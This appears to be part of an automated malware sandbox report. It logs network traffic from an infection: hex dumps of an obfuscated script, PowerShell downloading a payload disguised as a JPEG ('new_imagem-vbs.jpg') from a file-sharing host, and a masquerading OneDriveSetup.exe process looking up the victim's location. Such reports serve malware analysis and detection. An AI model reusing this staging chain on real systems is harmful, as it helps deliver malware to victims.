                                                                                                                                                                      2024-11-26 08:32:51 UTC1369INData Raw: 74 71 57 70 20 3d 20 22 4b 57 7a 5a 4e 74 6b 6b 66 55 68 49 4c 6d 67 22 0d 0a 68 64 4b 53 7a 6f 6d 52 53 41 57 41 4b 65 62 20 3d 20 22 57 6f 4b 69 55 71 66 69 4f 69 57 70 69 57 62 22 0d 0a 6f 64 4f 4b 4c 57 62 64 6d 4c 57 50 4c 70 74 20 3d 20 22 50 55 4b 4c 6e 69 4c 6f 4b 55 4c 6d 4c 5a 4b 22 0d 0a 55 6b 57 75 63 5a 76 7a 4c 48 4c 68 42 74 78 20 3d 20 22 49 62 53 67 4a 4b 47 55 55 54 4c 65 43 50 4f 22 0d 0a 6a 71 69 74 4e 65 73 4f 5a 4b 61 70 4e 69 57 20 3d 20 22 7a 6a 65 55 57 43 5a 69 65 55 65 78 4b 72 53 22 0d 0a 71 50 69 65 63 62 6b 5a 69 4c 63 52 41 63 55 20 3d 20 22 57 54 57 71 64 43 66 4b 47 66 4c 4f 4e 65 71 22 0d 0a 63 6e 75 4e 6b 47 64 7a 66 67 68 4e 47 62 78 20 3d 20 22 47 6b 4c 48 67 43 66 57 4c 62 65 75 61 67 4b 22 0d 0a 0d 0a 4f 69 62 4b 4b
                                                                                                                                                                      Data Ascii: tqWp = "KWzZNtkkfUhILmg"hdKSzomRSAWAKeb = "WoKiUqfiOiWpiWb"odOKLWbdmLWPLpt = "PUKLniLoKULmLZK"UkWucZvzLHLhBtx = "IbSgJKGUUTLeCPO"jqitNesOZKapNiW = "zjeUWCZieUexKrS"qPiecbkZiLcRAcU = "WTWqdCfKGfLONeq"cnuNkGdzfghNGbx = "GkLHgCfWLbeuagK"OibKK
                                                                                                                                                                      2024-11-26 08:32:51 UTC1369INData Raw: 69 63 69 57 50 57 74 57 69 62 69 7a 20 3d 20 22 78 70 53 62 69 55 4c 51 7a 7a 5a 69 6f 65 6b 22 0d 0a 66 6d 69 5a 42 5a 6f 49 6c 78 64 63 52 74 69 20 3d 20 22 52 69 66 68 69 50 63 74 4e 57 55 52 69 41 63 22 0d 0a 72 69 4c 4c 4c 6e 61 49 69 4b 4c 4b 6b 52 4b 20 3d 20 22 4c 43 4c 70 63 70 66 5a 7a 67 43 64 4c 6d 69 22 0d 0a 4a 69 57 63 47 6b 4c 55 43 70 65 4f 76 4a 6f 20 3d 20 22 6f 4c 69 6e 4c 4c 57 74 4c 70 4e 4c 55 71 69 22 0d 0a 7a 6a 4c 4a 5a 6f 6f 64 41 47 4c 74 5a 6d 66 20 3d 20 22 41 6d 64 49 55 69 51 57 63 69 68 62 6f 4e 66 22 0d 0a 67 61 78 64 47 4b 50 47 4c 47 66 68 50 6c 42 20 3d 20 22 47 57 73 69 7a 4c 65 62 65 47 6d 6b 4b 78 5a 22 0d 0a 4c 47 65 66 57 4c 67 65 42 4b 4b 55 71 71 57 20 3d 20 22 57 4c 41 4c 68 65 70 6b 57 4b 4c 52 47 55 6d 22 0d
                                                                                                                                                                      Data Ascii: iciWPWtWibiz = "xpSbiULQzzZioek"fmiZBZoIlxdcRti = "RifhiPctNWURiAc"riLLLnaIiKLKkRK = "LCLpcpfZzgCdLmi"JiWcGkLUCpeOvJo = "oLinLLWtLpNLUqi"zjLJZoodAGLtZmf = "AmdIUiQWcihboNf"gaxdGKPGLGfhPlB = "GWsizLebeGmkKxZ"LGefWLgeBKKUqqW = "WLALhepkWKLRGUm"
                                                                                                                                                                      2024-11-26 08:32:51 UTC1369INData Raw: 22 0d 0a 52 42 52 53 63 66 5a 74 4b 64 62 6d 4c 57 52 20 3d 20 22 47 42 68 6f 6c 4f 4c 6f 62 42 47 57 65 4c 50 22 0d 0a 52 69 47 52 53 75 41 6b 4c 4c 4c 64 66 4a 74 20 3d 20 22 6d 74 54 54 51 4c 43 65 4b 57 75 6b 69 57 65 22 0d 0a 55 4c 66 63 61 74 48 66 4a 50 6e 4c 41 5a 4f 20 3d 20 22 6a 52 5a 52 47 7a 68 4c 4e 5a 69 6d 47 69 7a 22 0d 0a 0d 0a 63 4b 64 65 64 69 7a 57 68 47 70 6f 6b 6e 7a 20 3d 20 22 68 42 69 6d 7a 52 5a 7a 4c 74 70 70 4b 5a 6d 22 0d 0a 57 65 6b 47 57 64 4c 63 63 6b 6f 57 6b 63 47 20 3d 20 22 4c 69 55 78 47 74 4b 72 4a 76 70 41 63 50 55 22 0d 0a 75 55 64 66 42 75 74 4c 6b 57 4c 4e 61 57 4b 20 3d 20 22 4c 4c 4b 57 49 4f 55 65 78 47 68 4c 7a 50 70 22 0d 0a 74 69 78 7a 57 57 6f 43 6f 4e 41 6d 75 63 68 20 3d 20 22 4c 51 69 4b 4c 43 62 63 75
                                                                                                                                                                      Data Ascii: "RBRScfZtKdbmLWR = "GBholOLobBGWeLP"RiGRSuAkLLLdfJt = "mtTTQLCeKWukiWe"ULfcatHfJPnLAZO = "jRZRGzhLNZimGiz"cKdedizWhGpoknz = "hBimzRZzLtppKZm"WekGWdLcckoWkcG = "LiUxGtKrJvpAcPU"uUdfButLkWLNaWK = "LLKWIOUexGhLzPp"tixzWWoCoNAmuch = "LQiKLCbcu
                                                                                                                                                                      2024-11-26 08:32:51 UTC1226INData Raw: 57 6b 78 76 69 63 66 63 22 0d 0a 4c 52 76 57 70 71 66 7a 5a 49 52 6d 4c 7a 55 20 3d 20 22 6c 54 4c 6b 4b 47 57 57 52 78 4c 78 55 70 68 22 0d 0a 4f 64 6e 57 6d 4e 4b 4c 43 52 57 4b 65 6b 78 20 3d 20 22 64 55 51 55 51 6a 47 66 49 72 47 73 54 55 54 22 0d 0a 4c 55 47 6e 69 51 4e 41 4c 63 70 74 66 63 41 20 3d 20 22 57 7a 4c 4c 4c 70 4c 47 43 47 4c 43 68 7a 4b 22 0d 0a 57 4e 65 6b 47 62 6d 57 4c 75 64 69 4c 4c 4c 20 3d 20 22 55 47 63 65 61 66 74 71 6b 6e 4b 6d 55 71 69 22 0d 0a 57 4b 64 4c 6b 62 65 6a 42 43 7a 41 57 71 4c 20 3d 20 22 4c 5a 68 6d 49 4c 47 4b 69 78 4c 61 75 75 4b 22 0d 0a 57 78 63 4c 4e 67 4b 68 65 4c 47 55 68 68 69 20 3d 20 22 57 57 74 4b 47 63 5a 63 4c 78 57 51 76 6f 57 22 0d 0a 0d 0a 6b 4c 4c 50 4e 62 63 4b 4c 62 6a 7a 70 75 4b 20 3d 20 22 66
                                                                                                                                                                      Data Ascii: Wkxvicfc"LRvWpqfzZIRmLzU = "lTLkKGWWRxLxUph"OdnWmNKLCRWKekx = "dUQUQjGfIrGsTUT"LUGniQNALcptfcA = "WzLLLpLGCGLChzK"WNekGbmWLudiLLL = "UGceaftqknKmUqi"WKdLkbejBCzAWqL = "LZhmILGKixLauuK"WxcLNgKheLGUhhi = "WWtKGcZcLxWQvoW"kLLPNbcKLbjzpuK = "f
                                                                                                                                                                      2024-11-26 08:32:51 UTC1369INData Raw: 32 30 30 30 0d 0a 75 75 6e 71 57 69 74 62 70 6f 66 22 0d 0a 6f 78 68 57 54 78 4c 57 4b 68 4f 41 55 6d 50 20 3d 20 22 4c 6f 6d 43 55 51 4b 47 6f 49 4c 4c 41 7a 50 22 0d 0a 67 69 52 69 4b 57 70 6d 4f 63 5a 4e 42 5a 68 20 3d 20 22 71 69 6c 71 55 57 61 4e 47 55 78 71 54 57 4b 22 0d 0a 41 62 41 4c 6c 71 57 4c 7a 51 4c 55 57 5a 70 20 3d 20 22 4c 62 47 50 69 51 57 4a 47 4b 54 42 5a 4a 63 22 0d 0a 0d 0a 66 6f 43 4e 48 4e 4b 57 67 4b 69 49 75 6f 4b 20 3d 20 22 4f 4c 74 57 4c 66 43 4e 6c 74 62 68 43 57 41 22 0d 0a 64 49 4c 75 63 6d 75 66 69 65 6c 63 6d 4c 4c 20 3d 20 22 55 4c 52 69 6b 41 41 70 62 63 4c 4e 57 55 41 22 0d 0a 61 57 70 4e 63 4c 4c 6f 71 4c 41 41 68 57 6f 20 3d 20 22 6c 71 4e 4c 71 68 55 42 43 61 73 47 4b 5a 7a 22 0d 0a 42 50 76 66 55 4b 7a 69 57 6a 4b
                                                                                                                                                                      Data Ascii: 2000uunqWitbpof"oxhWTxLWKhOAUmP = "LomCUQKGoILLAzP"giRiKWpmOcZNBZh = "qilqUWaNGUxqTWK"AbALlqWLzQLUWZp = "LbGPiQWJGKTBZJc"foCNHNKWgKiIuoK = "OLtWLfCNltbhCWA"dILucmufielcmLL = "ULRikAApbcLNWUA"aWpNcLLoqLAAhWo = "lqNLqhUBCasGKZz"BPvfUKziWjK
                                                                                                                                                                      2024-11-26 08:32:51 UTC1369INData Raw: 50 6b 57 57 6b 6d 20 3d 20 22 70 4b 57 74 52 4c 43 5a 66 57 6c 78 4c 57 70 22 0d 0a 68 6d 75 68 5a 68 66 4c 69 4b 4b 4c 6b 52 66 20 3d 20 22 4c 62 4b 6e 62 55 55 6b 6d 66 62 65 69 6f 41 22 0d 0a 6c 4e 63 4c 7a 78 4b 4f 6a 69 42 4b 70 70 61 20 3d 20 22 6f 69 55 4c 69 63 4c 4c 43 6b 4c 70 4c 6c 70 22 0d 0a 54 4b 5a 4a 74 52 6b 5a 68 4c 4c 47 47 72 4c 20 3d 20 22 57 6f 57 6a 68 6e 70 4f 4c 69 65 65 6b 47 54 22 0d 0a 63 68 41 4b 4c 61 69 47 4b 6d 73 50 7a 5a 51 20 3d 20 22 50 62 6b 69 61 52 4c 57 6b 55 48 47 6f 4b 57 22 0d 0a 47 4e 7a 4e 4c 75 72 6d 68 4b 62 6d 50 6d 62 20 3d 20 22 6f 4c 4a 6b 70 6d 65 6c 4c 65 7a 42 65 41 4f 22 0d 0a 41 4a 55 49 6d 6b 43 6d 4c 47 66 7a 74 50 55 20 3d 20 22 6f 68 6b 6f 4c 47 50 4c 41 4c 4c 6e 57 78 4c 22 0d 0a 0d 0a 4b 49 57
                                                                                                                                                                      Data Ascii: PkWWkm = "pKWtRLCZfWlxLWp"hmuhZhfLiKKLkRf = "LbKnbUUkmfbeioA"lNcLzxKOjiBKppa = "oiULicLLCkLpLlp"TKZJtRkZhLLGGrL = "WoWjhnpOLieekGT"chAKLaiGKmsPzZQ = "PbkiaRLWkUHGoKW"GNzNLurmhKbmPmb = "oLJkpmelLezBeAO"AJUImkCmLGfztPU = "ohkoLGPLALLnWxL"KIW
                                                                                                                                                                      2024-11-26 08:32:51 UTC1369INData Raw: 6b 42 69 49 50 6a 78 69 7a 4b 55 6b 6f 4b 20 3d 20 22 6b 4c 65 52 65 64 47 4c 5a 57 51 4c 5a 4c 6b 22 0d 0a 6f 4e 4c 63 4c 70 6f 4c 69 57 78 55 55 69 47 20 3d 20 22 57 4c 57 47 4e 4b 57 71 4a 74 71 4c 6f 63 5a 22 0d 0a 55 6a 48 4c 66 64 47 74 70 4b 6c 57 71 7a 4c 20 3d 20 22 64 57 6b 67 47 63 57 69 74 6f 63 6d 50 4c 74 22 0d 0a 43 5a 66 69 47 57 50 4c 70 63 63 69 52 69 57 20 3d 20 22 4c 64 4b 55 78 4b 7a 52 4c 47 53 4b 66 75 4c 22 0d 0a 53 49 66 74 78 49 78 41 74 4f 41 55 63 65 62 20 3d 20 22 4c 43 57 66 4c 6c 76 4c 63 52 4c 4c 7a 4c 42 22 0d 0a 6f 4c 78 62 57 6c 61 4a 64 69 4e 57 57 6e 6b 20 3d 20 22 4c 55 49 69 78 71 4b 47 75 5a 62 66 6b 78 4f 22 0d 0a 4c 7a 6b 65 4c 6b 6b 70 57 55 57 6f 4c 65 57 20 3d 20 22 64 6d 55 70 6f 4c 70 6b 4c 69 4a 78 57 75 69
                                                                                                                                                                      Data Ascii: kBiIPjxizKUkoK = "kLeRedGLZWQLZLk"oNLcLpoLiWxUUiG = "WLWGNKWqJtqLocZ"UjHLfdGtpKlWqzL = "dWkgGcWitocmPLt"CZfiGWPLpcciRiW = "LdKUxKzRLGSKfuL"SIftxIxAtOAUceb = "LCWfLlvLcRLLzLB"oLxbWlaJdiNWWnk = "LUIixqKGuZbfkxO"LzkeLkkpWUWoLeW = "dmUpoLpkLiJxWui


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.849707193.30.119.2054438064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:32:56 UTC211OUTGET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                                                                                                                      Host: 3105.filemail.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2024-11-26 08:32:57 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                      Content-Length: 2230233
                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                      Last-Modified: Mon, 25 Nov 2024 10:41:01 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      ETag: 67ad55be8fbd7389b2f5ef2b123a44b4
                                                                                                                                                                      X-Transfer-ID: ibybhsntnwgamsn
                                                                                                                                                                      Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:32:56 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-11-26 08:32:57 UTC1565INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                      2024-11-26 08:32:57 UTC8192INData Raw: 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc 8a 55 c8 61 e6 93 c0 dc 07 04 f7 db 95 34 35 aa d2 15 0a b1 96 41 fe 6b ef 89 1d 44 f2 b3 d4 6f d7 d5 4b 7b 49 bf fd 58 e6 b5 c9 78 d0 22 b2 93 5f 83 76 df 9e 02 3a e5 59 f4 71 06 01 42 a0 3c 50 24 93 d6 ba d6 44 32 a3 32 c6 64 66 89 58 2b 21 e3 82 2e ff 00 4c d2 68 85 06 2d 03 15 16 09 8b f0 8f f9 b3 2b 53 a6 78 64 0d e8 65 2c 18 80 9c 1e 7a d5 e0 6c bc 4b 06 8c 2e 98 b4 61 5c 51 56 e0 82 7b e2 fa bd 6a 47 e6 47 3b b2 95 55 55 55 6e 58 d1 e4 e5 9b ef 22 12 aa f1 9e 81 57 61 e8 7e b8 a9 f0 99 f5 32 07 d4 4c a5 81 aa 29 c0 fd 70 2b a4 7d 3c 7a 60 c9 33 42
                                                                                                                                                                      Data Ascii: h,U21Sucm6OUvy+"r/k1|\;,#oUa45AkDoK{IXx"_v:YqB<P$D22dfX+!.Lh-+Sxde,zlK.a\QV{jGG;UUUnX"Wa~2L)p+}<z`3B
                                                                                                                                                                      2024-11-26 08:32:57 UTC8192INData Raw: 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3
                                                                                                                                                                      Data Ascii: 5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%
                                                                                                                                                                      2024-11-26 08:32:57 UTC8192INData Raw: 8d 23 ea 7f 67 5e 27 a6 33 22 cb 34 f2 aa ed 62 ae a5 91 54 59 1d 39 cf 87 3b 33 40 49 1b 99 48 24 7b e7 dc ff 00 61 3a 9d 4c 9f 65 bc 42 03 12 f9 11 6a 83 23 16 36 cc cb ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a
                                                                                                                                                                      Data Ascii: #g^'3"4bTY9;3@IH${a:LeBj#6txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJ
                                                                                                                                                                      2024-11-26 08:32:57 UTC8192INData Raw: 91 63 a0 bc f9 d6 a4 01 be 23 b5 58 9a 07 93 58 ef d9 c0 d0 f8 d6 95 15 d8 ef 71 13 2e ea b0 dc 73 f5 37 f4 c0 a2 cf 11 65 56 2c 01 20 1a 3c 01 85 d6 3c 7e 4a 29 6b 70 78 7a 3c 2e 23 ab f0 f1 a0 f1 6d 54 20 ee 8d 27 74 5e 7b 2b 10 3f 96 5a 52 ec ab 7c df 41 80 c6 9f c4 a3 1e 26 cf 20 dc 88 a4 28 36 3f 2c 93 26 80 94 8e 45 91 62 69 83 4a ab c9 65 b1 c0 bc 4f ca 47 00 15 21 bd c7 73 86 6d 33 ea c8 8e 24 df 2e d3 41 79 3c 0b 3f a0 c0 92 f1 c8 de 62 ba ed 85 94 a1 20 83 b6 9a 81 1e e0 d7 e7 99 ea ea 9a 70 85 cb 5b 6f 65 b3 ea ae 83 a7 c8 fd 72 b1 12 b0 48 aa c4 d9 50 77 70 40 a3 d3 18 08 91 a8 2c 55 c2 ad 2a 91 c9 f8 9f d3 00 69 af 79 b5 12 04 4d bb c0 55 61 ce c1 ed c6 3e 64 86 76 d3 e9 9a 42 cf 23 d3 3e c2 2a e8 0f d3 31 a2 95 60 d6 2c a6 30 cb 76 53 a5 8c
                                                                                                                                                                      Data Ascii: c#XXq.s7eV, <<~J)kpxz<.#mT 't^{+?ZR|A& (6?,&EbiJeOG!sm3$.Ay<?b p[oerHPwp@,U*iyMUa>dvB#>*1`,0vS
                                                                                                                                                                      2024-11-26 08:32:57 UTC8192INData Raw: 9a 4d f6 73 53 22 90 26 d3 2e e0 45 17 61 7f f8 73 27 53 e1 3a 84 d7 26 81 65 46 d4 12 00 65 b6 db fa 74 ac 0e d2 f8 c6 a7 45 02 40 91 e9 9d 53 80 58 31 b1 b8 b0 fe 2a ef 9c 7e d3 eb 96 69 5e 48 74 8c 59 02 15 d8 c0 50 dd fe 6f 8e 54 7d 9c d4 34 f2 40 75 70 34 b1 82 d2 07 66 5e 3d c7 a6 ab 0b ab f0 09 34 71 87 d4 6a f4 aa ac 09 52 59 89 22 c7 40 17 9c 00 78 af da 5d 4f 88 69 5f 4d a8 d3 e9 5a 27 36 55 51 85 90 6f a8 6b ec 33 ce 36 87 7c c4 a8 55 52 49 21 45 d1 e3 8f 51 39 b1 16 89 e6 76 48 91 a7 2a 7a a2 b5 57 63 d0 66 a4 5f 67 35 44 29 67 89 5c f5 52 c6 c7 e4 2b 03 23 47 ac f1 0f 0e d2 be 96 29 0a a3 13 4d 6c 0a f5 e1 79 aa e7 db 22 24 4d 36 ac ea 5a 38 b5 0e c7 75 48 59 80 6b 1e a3 ee 73 75 fe cc eb 9c 58 96 2f 80 dc df fa 72 a3 ec b6 b8 8e 65 d3 7f cc
                                                                                                                                                                      Data Ascii: MsS"&.Eas'S:&eFetE@SX1*~i^HtYPoT}4@up4f^=4qjRY"@x]Oi_MZ'6UQok36|URI!EQ9vH*zWcf_g5D)g\R+#G)Mly"$M6Z8uHYksuX/re
                                                                                                                                                                      2024-11-26 08:32:57 UTC8192INData Raw: 33 05 af 4f c3 0f a0 30 ca 85 e3 75 66 1c 9b ea 33 47 55 09 96 1d a3 6f 4e 0d 58 c4 f4 9e 11 1c 3a 81 2a 9a b1 ea e6 86 02 33 4f 3c 1a 95 08 cc d7 c7 1e d7 84 11 cd 23 ef 20 b1 34 40 1c f1 9a f2 41 12 33 a8 51 4a 7a fc b1 0d 31 75 3a b8 37 d8 6f 5a 3a 74 5d df c3 f4 c0 4e 6d 4c b0 6f 1b 94 31 e8 0f 6c 98 bc 4d ad 28 2e e0 2a af a9 f7 c5 48 9b cf d9 a9 d3 c9 23 2f 0a ea bd 7f 3e 32 35 72 18 24 04 69 cf 4a 52 6b 83 f4 c0 d7 97 c5 35 1a 7a 2b 1c 6f 1b 8b 6f 55 15 3e f5 93 1e b9 de 16 69 1a c0 e7 93 d3 3c ec f3 4e ac 55 c3 06 00 75 ed df 1d 79 74 c5 23 02 60 03 00 cc 07 bf b5 60 55 66 9b 59 ab dc 37 04 be d9 a2 27 d4 a2 b1 8f 4b c0 1c 16 61 67 f5 c6 60 d2 c4 9a 65 64 06 aa ec 29 c9 8d d4 39 34 c7 8e 84 60 62 ea 5d ce be 3d 40 8b 66 e5 01 b9 03 9c 6f 51 e5 a2
                                                                                                                                                                      Data Ascii: 3O0uf3GUoNX:*3O<# 4@A3QJz1u:7oZ:t]NmLo1lM(.*H#/>25r$iJRk5z+ooU>i<NUuyt#``UfY7'Kag`ed)94`b]=@foQ
                                                                                                                                                                      2024-11-26 08:32:57 UTC8192INData Raw: 92 cd c3 02 d2 0a a0 39 0c 00 ae 9c d9 19 81 ac 32 b7 84 bc 92 a2 a9 66 0c aa ab 5b 41 ec 7e 38 08 3c 87 4d a7 09 12 a9 2d df db 12 9f 73 31 2c ea c7 82 6a f8 e3 09 a5 90 ef 08 e6 c2 9e 2f 07 3a b0 91 c0 07 61 62 01 00 85 63 78 1d a7 d3 1d 45 1d e1 45 f2 4e 07 68 56 e1 85 76 38 4d 34 72 49 26 d8 c3 31 1c ed 5e f9 4d 8c ed b5 53 9e 95 80 cc 0a 18 b0 89 0e e0 38 62 09 00 77 f9 1c b7 dd 09 68 85 8a 6a dc d5 40 72 6e ff 00 4c 95 87 ee 7c cc 69 88 b0 8a 6e c7 c7 b6 0f 51 a8 69 18 47 b0 47 18 3e 95 0b 46 bb 60 6e 1d 44 5a 3d 51 4d 2f 94 d7 e6 06 65 04 72 ab 60 5f ce b9 c4 34 a1 27 66 69 91 14 ac 1b 94 b1 62 03 19 05 13 56 48 e7 a6 67 3e a2 57 91 5d e4 91 99 6b 69 66 24 8f ae 74 73 32 4b bc 3b 06 bb 04 31 1d 7a e0 6a 79 71 c4 24 91 63 32 6d 74 50 05 f7 52 49 53
                                                                                                                                                                      Data Ascii: 92f[A~8<M-s1,j/:abcxEENhVv8M4rI&1^MS8bwhj@rnL|inQiGG>F`nDZ=QM/er`_4'fibVHg>W]kif$ts2K;1zjyq$c2mtPRIS
                                                                                                                                                                      2024-11-26 08:32:57 UTC8192INData Raw: c4 b1 11 22 a9 11 ac 92 70 b6 e4 ed 05 7a 71 c5 9c ed 4f 88 b8 d6 4e 91 cd 52 33 46 61 89 55 76 be ea bb 6a fe a3 03 60 68 c6 a7 50 d2 6a f6 49 51 f9 60 14 2b 64 35 86 14 7e 98 69 23 0c d0 4d 2a 44 cf 11 6e 42 b0 34 48 02 89 63 5f ae 61 37 8b ea 4c a8 9b 99 40 92 65 6d 8a bb a9 40 23 96 e3 8e 7e 99 7d 7f 8b ea 20 9c 2c d2 4b 14 4c aa 61 60 8a c1 8a 8f 56 e1 d7 93 40 56 06 c6 b6 78 7f d9 d3 4e 51 6b cb 61 61 c0 a5 3e c4 83 df 3e 5d e2 2f 13 eb 8f 96 1d 23 ba a2 43 30 fc 80 fe 99 e8 75 de 2a fa f6 12 4a c9 14 60 92 14 74 f7 e7 f2 ff 00 db bf 94 d5 96 6d 43 3d 0a 26 f8 ed 80 cb e9 e3 da 36 ea 62 6b 1c 29 0c 09 f8 1e 2a fe b8 fe b5 64 4d 66 a4 3d b9 99 42 c4 55 41 0d eb 52 54 7e 59 8d fb d7 65 2a ac 41 14 a7 de b3 4a 7d 44 9a 5d 4e a5 f6 ab 89 24 6e 0f e1 5e
                                                                                                                                                                      Data Ascii: "pzqONR3FaUvj`hPjIQ`+d5~i#M*DnB4Hc_a7L@em@#~} ,KLa`V@VxNQkaa>>]/#C0u*J`tmC=&6bk)*dMf=BUART~Ye*AJ}D]N$n^
                                                                                                                                                                      2024-11-26 08:32:57 UTC8192INData Raw: 25 90 b7 7d f1 b0 ce cd f8 97 9e d9 52 ae 8e 2b 6d 13 cd 60 4a c5 a9 31 92 40 23 d8 f5 c5 8a 3b b1 01 0d 8f 6c d9 13 6c 55 5e 28 0e f8 0d 4a 8d ea ea 54 06 eb 58 19 aa cf 19 ae 40 ee 32 e9 24 ac de 8e 72 e5 fd 54 00 3f 1c 24 52 ec 92 ce d2 0e 00 25 de cc 77 2f 23 24 6f d8 2a eb 1a 95 d8 b7 05 43 1e 98 05 2e 8a 58 11 d7 b6 05 02 3b 75 0d 58 44 84 b3 10 69 6b b1 ef 8c 24 8f 4a 0e d6 24 5d af 6c 26 cd d6 4b 6e 66 fd 30 15 28 e4 ed db 5f e5 c3 26 9e 52 ab e8 e3 0e c8 ec ca 87 b7 43 ef 87 04 c2 02 1e 4f 73 ed f0 c0 50 c4 c4 6c 55 e1 7a 9f 73 9c 23 2a 79 18 e0 52 a0 90 6f 76 41 5f e1 23 00 02 32 c6 f6 f5 c2 08 8d 7e 1a c6 23 52 0d 01 c6 1e 18 0b 03 c6 02 8b 16 68 69 23 70 82 a1 dc 3b 5b d6 42 c2 6a ab be 69 e8 f4 ee 12 33 6b c3 1e 3e 98 0a ca ba 9e 07 92 23 1e
                                                                                                                                                                      Data Ascii: %}R+m`J1@#;llU^(JTX@2$rT?$R%w/#$o*C.X;uXDik$J$]l&Knf0(_&RCOsPlUzs#*yRovA_#2~#Rhi#p;[Bji3k>#


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.849713172.67.177.1344437588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:33:23 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2024-11-26 08:33:23 UTC853INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:23 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 361
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                      Age: 573912
                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                                      Accept-Ranges: bytes
